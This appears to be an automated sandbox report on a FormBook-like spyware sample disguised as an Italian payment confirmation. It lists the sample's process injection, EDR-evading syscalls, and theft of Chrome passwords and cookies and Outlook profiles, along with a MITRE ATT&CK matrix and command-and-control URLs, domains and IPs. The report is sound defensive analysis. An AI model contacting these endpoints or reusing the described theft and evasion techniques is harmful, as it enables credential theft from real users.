            Source: rGdWid9z.exe, 00000003.00000000.403059453.0000000000B80000.00000002.00000001.00040000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.627042938.0000000000B80000.00000002.00000001.00040000.00000000.sdmp, BupJjuMCJB.exe, 00000005.00000000.434017018.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Windows\SysWOW64\net1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cxex2xx0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cxex2xx0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cxex2xx0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cxex2xx0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cxex2xx0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cxex2xx0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cxex2xx0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cxex2xx0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000002.00000002.419495871.0000000000290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626895631.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.419524838.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626885310.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.626989631.0000000000560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626861797.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.481410737.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.419614314.0000000001FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.627085177.0000000003E60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\net1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000002.00000002.419495871.0000000000290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626895631.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.419524838.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626885310.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.626989631.0000000000560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626861797.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.481410737.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.419614314.0000000001FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.627085177.0000000003E60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote Services1
            Email Collection            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		312
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Browser Session Hijacking            		4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            Remote System Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync114
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1651192 Sample: LETTERA DI CONFERMA DEL PAG... Startdate: 28/03/2025 Architecture: WINDOWS Score: 100 32 www.031232899.xyz 2->32 34 031232899.xyz 2->34 48 Suricata IDS alerts for network traffic 2->48 50 Antivirus detection for URL or domain 2->50 52 Multi AV Scanner detection for submitted file 2->52 56 4 other signatures 2->56 10 LETTERA DI CONFERMA DEL PAGAMENTO.exe 2 2->10         started        signatures3 54 Performs DNS queries to domains with low reputation 32->54 process4 signatures5 70 Binary is likely a compiled AutoIt script file 10->70 72 Writes to foreign memory regions 10->72 74 Maps a DLL or memory area into another process 10->74 13 svchost.exe 10->13         started        process6 signatures7 76 Maps a DLL or memory area into another process 13->76 16 rGdWid9z.exe 13->16 injected process8 signatures9 44 Maps a DLL or memory area into another process 16->44 46 Found direct / indirect Syscall (likely to bypass EDR) 16->46 19 net1.exe 1 20 16->19         started        process10 dnsIp11 36 www.sqlite.org 45.33.6.223, 49162, 80 LINODE-APLinodeLLCUS United States 19->36 30 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 19->30 dropped 58 Tries to steal Mail credentials (via file / registry access) 19->58 60 Tries to harvest and steal browser information (history, passwords, etc) 19->60 62 Maps a DLL or memory area into another process 19->62 64 Queues an APC in another process (thread injection) 19->64 24 BupJjuMCJB.exe 19->24 injected 28 firefox.exe 19->28         started        file12 signatures13 process14 dnsIp15 38 www.777assistant.xyz 24->38 40 www.streartex.live 162.254.38.217, 49179, 49180, 49181 COGECO-PEER1CA United States 24->40 42 6 other IPs or domains 24->42 66 Found direct / indirect Syscall (likely to bypass EDR) 24->66 signatures16 68 Performs DNS queries to domains with low reputation 38->68

            Screenshots

            Download Video

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            LETTERA DI CONFERMA DEL PAGAMENTO.exe42%VirustotalBrowse
            SAMPLE100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.viatotor.cfd/awht/?Up5Dxd=8WWHC7wWqzabLylEqC4h4xSUa5Q1ERPluRInRnvP6aHLJY6FsD1in5Ba6ce0RJeZH7zN6VIqS0duX3wRoykHaMJocpJ8Lyik8tyRvKfKAYeOrifkhUVyVr4B9LR1&RtRt=H2TxDP-0yx100%Avira URL Cloudmalware
            http://www.hypehike.buzz/j7vq/?Up5Dxd=Bcl9cp41dlHcDC4N7AFqYtSrkG8XSNj0Dw08raKVYGNnS8Fk0dwOiPOkXhtRLsFmQzGgwtyTAOUIspu4tmMliVEfuoO5YMFyI/UM7bEFhyYTRsu/qMC3INXijMdt&RtRt=H2TxDP-0yx0%Avira URL Cloudsafe
            http://www.viatotor.cfd/awht/100%Avira URL Cloudmalware
            http://www.morpakampus.com/3lf9/?Up5Dxd=5GxzxjzYtuQVaXKi96wJQlL5jVVVED3gsqLy8xSnFJL9Njv/LCMj1519KCJv/YXWDbEHwXyFpdS6CdsXIHJjWfKOpLe5XFlJMx8QFerMn32IswyHn8LLdrliT4lw&RtRt=H2TxDP-0yx0%Avira URL Cloudsafe
            http://www.hypehike.buzz/j7vq/0%Avira URL Cloudsafe
            http://www.ambitiouswomen.net/tskx/?Up5Dxd=3FZsyYtvHJrwTHHvKE69JLGDZnzKmCnrMuqRAlJnKL7t2F6wJjOvapVJjCl/gRiWQVTLflE3WPZwa5xfwkUpPmC6JxN15cgxThe6GU7HJW2U+NF71xQUQBXCRD3d&RtRt=H2TxDP-0yx0%Avira URL Cloudsafe
            http://www.morpakampus.com/3lf9/0%Avira URL Cloudsafe
            http://www.streartex.live0%Avira URL Cloudsafe
            https://www.morpakampus.com/3lf9/?Up5Dxd=5GxzxjzYtuQVaXKi96wJQlL5jVVVED3gsqLy8xSnFJL9Njv/LCMj1519KCJ0%Avira URL Cloudsafe
            http://www.streartex.live/qmo0/0%Avira URL Cloudsafe
            http://www.streartex.live/qmo0/?Up5Dxd=s/riq2Gjc84WkOXIPYK3MDRDBcdtSPFB6JhYX0OHrW5JrEb3J4m1Tdn1DtTVCNN6q5y0/nExmx/pVjwhpLktH0ipuaSv5IUB3fbV39kfxE7kNJsXW33X5BidtZsd&RtRt=H2TxDP-0yx0%Avira URL Cloudsafe
            http://www.777assistant.xyz/s1k7/?RtRt=H2TxDP-0yx&Up5Dxd=zKlqO7QNcfetDPpTJRNWr1IyWy9Pz553WMXns1xrbNYpuLFGGplxzK50t++Wm/Dpu5XCEj5cJoLsJvwgvv1H2BlHGmx6spHmojpwT52SXD2CVd9QciE69D6Wx6Ed100%Avira URL Cloudmalware
            http://www.ambitiouswomen.net/tskx/0%Avira URL Cloudsafe

            Domains and IPs

            Download Network PCAP: filteredfull

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            94950.bodis.com
            		199.59.243.228
            		truefalse
              		high
              www.ambitiouswomen.net
              		76.223.54.146
              		truetrue
                		unknown
                www.viatotor.cfd
                		104.21.94.162
                		truetrue
                  		unknown
                  031232899.xyz
                  		144.76.229.203
                  		truetrue
                    		unknown
                    www.streartex.live
                    		162.254.38.217
                    		truetrue
                      		unknown
                      www.777assistant.xyz
                      		76.223.54.146
                      		truetrue
                        		unknown
                        www.sqlite.org
                        		45.33.6.223
                        		truefalse
                          		high
                          www.morpakampus.com
                          		104.26.0.177
                          		truetrue
                            		unknown
                            www.hypehike.buzz
                            		unknown
                            		unknownfalse
                              		unknown
                              www.031232899.xyz
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.morpakampus.com/3lf9/?Up5Dxd=5GxzxjzYtuQVaXKi96wJQlL5jVVVED3gsqLy8xSnFJL9Njv/LCMj1519KCJv/YXWDbEHwXyFpdS6CdsXIHJjWfKOpLe5XFlJMx8QFerMn32IswyHn8LLdrliT4lw&RtRt=H2TxDP-0yxtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.viatotor.cfd/awht/?Up5Dxd=8WWHC7wWqzabLylEqC4h4xSUa5Q1ERPluRInRnvP6aHLJY6FsD1in5Ba6ce0RJeZH7zN6VIqS0duX3wRoykHaMJocpJ8Lyik8tyRvKfKAYeOrifkhUVyVr4B9LR1&RtRt=H2TxDP-0yxtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.viatotor.cfd/awht/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.hypehike.buzz/j7vq/?Up5Dxd=Bcl9cp41dlHcDC4N7AFqYtSrkG8XSNj0Dw08raKVYGNnS8Fk0dwOiPOkXhtRLsFmQzGgwtyTAOUIspu4tmMliVEfuoO5YMFyI/UM7bEFhyYTRsu/qMC3INXijMdt&RtRt=H2TxDP-0yxtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zipfalse
                                  		high
                                  http://www.hypehike.buzz/j7vq/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.streartex.live/qmo0/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.ambitiouswomen.net/tskx/?Up5Dxd=3FZsyYtvHJrwTHHvKE69JLGDZnzKmCnrMuqRAlJnKL7t2F6wJjOvapVJjCl/gRiWQVTLflE3WPZwa5xfwkUpPmC6JxN15cgxThe6GU7HJW2U+NF71xQUQBXCRD3d&RtRt=H2TxDP-0yxtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.morpakampus.com/3lf9/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.streartex.live/qmo0/?Up5Dxd=s/riq2Gjc84WkOXIPYK3MDRDBcdtSPFB6JhYX0OHrW5JrEb3J4m1Tdn1DtTVCNN6q5y0/nExmx/pVjwhpLktH0ipuaSv5IUB3fbV39kfxE7kNJsXW33X5BidtZsd&RtRt=H2TxDP-0yxtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.777assistant.xyz/s1k7/?RtRt=H2TxDP-0yx&Up5Dxd=zKlqO7QNcfetDPpTJRNWr1IyWy9Pz553WMXns1xrbNYpuLFGGplxzK50t++Wm/Dpu5XCEj5cJoLsJvwgvv1H2BlHGmx6spHmojpwT52SXD2CVd9QciE69D6Wx6Edtrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.ambitiouswomen.net/tskx/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabnet1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drfalse
                                        		high
                                        https://support.google.com/chrome/?p=plugin_flashnet1.exe, 00000004.00000003.468329134.0000000006550000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchnet1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drfalse
                                            		high
                                            http://www.streartex.liveBupJjuMCJB.exe, 00000005.00000002.626989631.00000000005B8000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.google.com/favicon.ico1n61p-.4.drfalse
                                              		high
                                              https://ac.ecosia.org/autocomplete?q=net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drfalse
                                                		high
                                                https://www.google.comnet1.exe, 00000004.00000002.627691581.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 00000004.00000002.627315561.0000000001886000.00000004.10000000.00040000.00000000.sdmp, BupJjuMCJB.exe, 00000005.00000002.627266394.00000000035F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://www.morpakampus.com/3lf9/?Up5Dxd=5GxzxjzYtuQVaXKi96wJQlL5jVVVED3gsqLy8xSnFJL9Njv/LCMj1519KCJnet1.exe, 00000004.00000002.627315561.0000000001D3C000.00000004.10000000.00040000.00000000.sdmp, BupJjuMCJB.exe, 00000005.00000002.627266394.0000000003AAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drfalse
                                                    		high
                                                    http://www.sqlite.org/copyright.html.net1.exe, 00000004.00000002.627948410.0000000061ECD000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drfalse
                                                      		high
                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        45.33.6.223
                                                        		www.sqlite.orgUnited States
                                                        		63949LINODE-APLinodeLLCUSfalse
                                                        76.223.54.146
                                                        		www.ambitiouswomen.netUnited States
                                                        		16509AMAZON-02UStrue
                                                        104.21.94.162
                                                        		www.viatotor.cfdUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        199.59.243.228
                                                        		94950.bodis.comUnited States
                                                        		395082BODIS-NJUSfalse
                                                        104.26.0.177
                                                        		www.morpakampus.comUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        162.254.38.217
                                                        		www.streartex.liveUnited States
                                                        		13768COGECO-PEER1CAtrue

                                                        General Information

                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1651192
                                                        Start date and time:2025-03-28 14:32:52 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 19s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:LETTERA DI CONFERMA DEL PAGAMENTO.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/7@8/6
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        09:34:28API Interceptor2273x Sleep call for process: BupJjuMCJB.exe modified
                                                        09:34:32API Interceptor2071659x Sleep call for process: net1.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        45.33.6.223Payent confirmation copy 00888754087.scrGet hashmaliciousFormBookBrowse
                                                        • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                        mind.ps1Get hashmaliciousFormBookBrowse
                                                        • www.sqlite.org/2017/sqlite-dll-win32-x86-3190000.zip
                                                        Purchase Order Ref 68735.exeGet hashmaliciousFormBookBrowse
                                                        • www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
                                                        Quotation.exeGet hashmaliciousFormBookBrowse
                                                        • www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip
                                                        PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                        • www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
                                                        RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                        • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                                                        PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                        • www.sqlite.org/2016/sqlite-dll-win32-x86-3110000.zip
                                                        HZ1ZzlIpm7.vbeGet hashmaliciousFormBookBrowse
                                                        • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                        RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                        • www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
                                                        0CkEHZjZgO.vbsGet hashmaliciousFormBookBrowse
                                                        • www.sqlite.org/2020/sqlite-dll-win32-x86-3320000.zip
                                                        76.223.54.146MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                        • www.dubaicarpark.xyz/v7hg/
                                                        PO_P0986880_03282025.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.loyalists.net/uafu/
                                                        Quote 19847222.exeGet hashmaliciousFormBookBrowse
                                                        • www.kantad.xyz/19mv/?Vthd=m4ZDmUsWOZNyQ7rcI3Jnh0D98CGGzlqcN4sVj++dpMHtIooNiMtznlQs2pIYE9vFjoT3bvOz4K0ixAk5+xbuYi5t4Dn+TL8JJ7xaio/b8rSKiaTz2A==&Sbo=phnX
                                                        REQUEST FOR QUOTATION AND CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                        • www.xdoge.live/rqbc/?ZpehBN=5sg9WStJmed6VjME3Kfe64Nik1rgYAPNNF5Ls1M9hX3++qOsrt9497SUNUde2qgu72/qGY5naHSQYzut4RKpoGKhKMh1mw1U1fObDwtzHagcS7wPzQ==&QB=CJnT-
                                                        ur3RqLz9DB.exeGet hashmaliciousFormBookBrowse
                                                        • www.vczuahand.xyz/lvz4/
                                                        givemebestthingsforgivemebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                        • www.vczuahand.xyz/lvz4/
                                                        Payent confirmation copy 00888754087.scrGet hashmaliciousFormBookBrowse
                                                        • www.moonavatar.xyz/r9i5/
                                                        Contract-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.renco.tech/4xqb/
                                                        Updated Price List for 2025 Business Year.exeGet hashmaliciousFormBookBrowse
                                                        • www.shibbets.xyz/r026/
                                                        PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                        • www.erectus.xyz/6kxc/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        94950.bodis.comPurchase order.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        FG_ShippingNotice_20250310_XDGF.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        PO_P0986880_03282025.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        QUOTATION#0072395.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        adani quotation request.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
